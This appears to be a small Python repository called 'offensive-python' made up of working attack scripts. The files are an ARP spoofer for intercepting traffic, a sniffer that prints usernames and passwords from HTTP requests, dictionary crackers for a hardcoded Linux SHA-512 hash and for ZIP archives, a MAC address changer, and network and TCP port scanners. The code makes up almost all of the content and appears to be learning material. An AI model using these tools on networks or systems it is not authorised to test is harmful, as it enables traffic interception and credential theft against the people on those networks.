├── README.md ├── arp_spoof.py ├── linux_pass_cracker.py ├── mac_changer.py ├── network_scanner.py ├── packet_sniffer.py ├── tcp_scanner.py └── zip_cracker.py /README.md: -------------------------------------------------------------------------------- 1 | # offensive-python -------------------------------------------------------------------------------- /arp_spoof.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import scapy.all as scapy 3 | import argparse 4 | import time 5 | import sys 6 | 7 | def get_arguments(): 8 | parser = argparse.ArgumentParser() 9 | parser.add_argument("-t", "--target", dest="target", help="Specify target ip") 10 | parser.add_argument("-g", "--gateway", dest="gateway", help="Specify spoof ip") 11 | return parser.parse_args() 12 | 13 | def get_mac(ip): 14 | arp_packet = scapy.ARP(pdst=ip) 15 | broadcast_packet = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") 16 | arp_broadcast_packet = broadcast_packet/arp_packet 17 | answered_list = scapy.srp(arp_broadcast_packet, timeout=1, verbose=False)[0] 18 | return answered_list[0][1].hwsrc 19 | 20 | def restore(destination_ip, source_ip): 21 | destination_mac = get_mac(destination_ip) 22 | source_mac = get_mac(source_ip) 23 | packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=destination_mac, psrc=source_ip, hwsrc=source_mac) 24 | scapy.send(packet, 4) 25 | 26 | def spoof(target_ip, spoof_ip): 27 | target_mac = get_mac(target_ip) 28 | packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip) 29 | scapy.send(packet, verbose=False) 30 | 31 | 32 | arguments = get_arguments() 33 | sent_packets = 0 34 | try: 35 | while True: 36 | spoof(arguments.target, arguments.gateway) 37 | spoof(arguments.gateway, arguments.target) 38 | sent_packets+=2 39 | print("\r[+] Sent packets: " + str(sent_packets)), 40 | sys.stdout.flush() 41 | time.sleep(2) 42 | 43 | except KeyboardInterrupt: 44 | print("\n[-] Ctrl + C detected.....Restoring ARP Tables Please Wait!") 45 | restore(arguments.target,arguments.gateway) 46 | restore(arguments.gateway, arguments.target) 47 | 48 | 49 | -------------------------------------------------------------------------------- /linux_pass_cracker.py: -------------------------------------------------------------------------------- 1 | import crypt 2 | 3 | password = open("password.txt", 'r') 4 | for passwd in password.readlines(): 5 | passwd = passwd.strip("\n").strip("\r") 6 | var = crypt.crypt(passwd,"$6$"+"8HOLitkI") 7 | if var == "$6$8HOLitkI$9HECw2MBzISI1O.RoyJdfugy4VHsTOU4RDTewcFECnZdWLpmtVwNo5a1/hg2kw4Qu74F08eMEwpLdK1eovfEd/": 8 | print("password found: ", passwd ) 9 | break 10 | else: 11 | print("trying....") 12 | -------------------------------------------------------------------------------- /mac_changer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | import optparse 4 | 5 | def change_mac(interface, new_mac): 6 | print("[+] Changing MAC for interface " + interface + " to " + new_mac) 7 | 8 | subprocess.call(["ifconfig", interface, "down"]) 9 | subprocess.call(["ifconfig", interface, "hw", "ether", new_mac]) 10 | subprocess.call(["ifconfig", interface, "up"]) 11 | 12 | def get_arguments(): 13 | parser = optparse.OptionParser() 14 | parser.add_option("-i", "--interface", dest="interface", help="Specify interface to change MAC for, use --help for usage") 15 | parser.add_option("-m", "--mac", dest="new_mac", help="Specify the new MAC , use --help for usage") 16 | (options, agruments) = parser.parse_args() 17 | if not options.interface: 18 | parser.error("[-] Please specify interface, use --help for usage") 19 | elif not options.new_mac: 20 | parser.error("[-] Please specify MAC , use --help for usage") 21 | return options 22 | 23 | 24 | 25 | options = get_arguments() 26 | change_mac(options.interface, options.new_mac) 27 | -------------------------------------------------------------------------------- /network_scanner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import scapy.all as scapy 3 | import argparse 4 | 5 | def get_arguments(): 6 | parser = argparse.ArgumentParser() 7 | parser.add_argument("-t", "--target", dest="target", help="Sepcify target ip or ip range") 8 | options = parser.parse_args() 9 | return options 10 | 11 | def scan(ip): 12 | arp_packet = scapy.ARP(pdst=ip) 13 | broadcast_packet = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") 14 | arp_broadcast_packet = broadcast_packet/arp_packet 15 | answered_list = scapy.srp(arp_broadcast_packet, timeout=1, verbose=False)[0] 16 | client_list = [] 17 | 18 | for element in answered_list: 19 | client_dict = {"ip": element[1].psrc, "mac": element[1].hwsrc} 20 | client_list.append(client_dict) 21 | 22 | return client_list 23 | 24 | def print_result(scan_list): 25 | print("IP\t\t\tMAC\n----------------------------------------") 26 | for client in scan_list: 27 | print(client["ip"] + "\t\t" + client["mac"]) 28 | 29 | options = get_arguments() 30 | result_list = scan(options.target) 31 | print_result(result_list) 32 | 33 | -------------------------------------------------------------------------------- /packet_sniffer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import scapy.all as scapy 3 | import argparse 4 | from scapy.layers import http 5 | def get_interface(): 6 | parser = argparse.ArgumentParser() 7 | parser.add_argument("-i", "--interface", dest="interface", help="Specify interface on which to sniff packets") 8 | arguments = parser.parse_args() 9 | return arguments.interface 10 | 11 | def sniff(iface): 12 | scapy.sniff(iface=iface, store=False, prn=process_packet) 13 | 14 | def process_packet(packet): 15 | if packet.haslayer(http.HTTPRequest): 16 | print("[+] Http Request >> " + packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path) 17 | if packet.haslayer(scapy.Raw): 18 | load = packet[scapy.Raw].load 19 | keys = ["username", "password", "pass", "email"] 20 | for key in keys: 21 | if key in load: 22 | print("\n\n\n[+] Possible password/username >> " + load + "\n\n\n") 23 | break 24 | 25 | iface = get_interface() 26 | sniff(iface) 27 | -------------------------------------------------------------------------------- /tcp_scanner.py: -------------------------------------------------------------------------------- 1 | from socket import * #importing everything from bluit in python module socket 2 | import optparse #importing optparse library for accepting arguments 3 | import threading # threading library for simultaneous execution of program or functions 4 | 5 | def portScan(host, port): 6 | try: 7 | s = socket(AF_INET, SOCK_STREAM) #creating an object of class socket AF_INET for ipv4 and AF_INET6 for ipv6 8 | #SOCK_STREAM is for tcp(protocol) and SOCK_DGRAM id for udp(protocol) 9 | s.connect((host, int(port))) # connecting to the socket with target host and port 10 | print(host + " tcp/" + str(port) + " open") 11 | s.close() 12 | 13 | except: 14 | print(host + " tcp/" + str(port) + " closed") # print this if unable to connect (meaning port closed) 15 | 16 | 17 | def main(): 18 | 19 | parser = optparse.OptionParser("uasge%prog " + "-H -p ") 20 | parser.add_option("-H" , '--host' , dest = 'targethost' , type = 'string' , help = 'specify target hsot') 21 | parser.add_option("-p", "--ports", dest = 'targetports', type = 'string', help = 'specify target ports separated by "," ') 22 | 23 | option , args = parser.parse_args() # this functions returns the arguments received inside object options 24 | 25 | thost = option.targethost # accessing arguments 26 | tports = str(option.targetports).split(",") 27 | 28 | if thost == None or tports[0] == None: 29 | print(parser.usage) #prints the usage defined inside the OptionParser class Above as string 30 | exit(0) 31 | 32 | 33 | setdefaulttimeout(1) # close connection if no response is received 34 | host_ip = gethostbyname(thost) # get the target ip using target domain 35 | 36 | for port in tports: 37 | t = threading.Thread(target=portScan, args=(thost,port)) # creating a portScann Function thread for each port in port list 38 | t.start() #Starting the thread 39 | 40 | main() 41 | -------------------------------------------------------------------------------- /zip_cracker.py: -------------------------------------------------------------------------------- 1 | 2 | import zipfile 3 | 4 | obj = zipfile.ZipFile("test.zip") 5 | 6 | f = open("password.txt", 'r') 7 | 8 | for password in f.readlines(): 9 | password = password.strip("\n").strip("\r") 10 | 11 | try: 12 | obj.extractall(pwd=password) 13 | print("Password Found: " + password + " <<<<<<<<<<") 14 | 15 | except: 16 | print("Trying.......") 17 | 18 | 19 | --------------------------------------------------------------------------------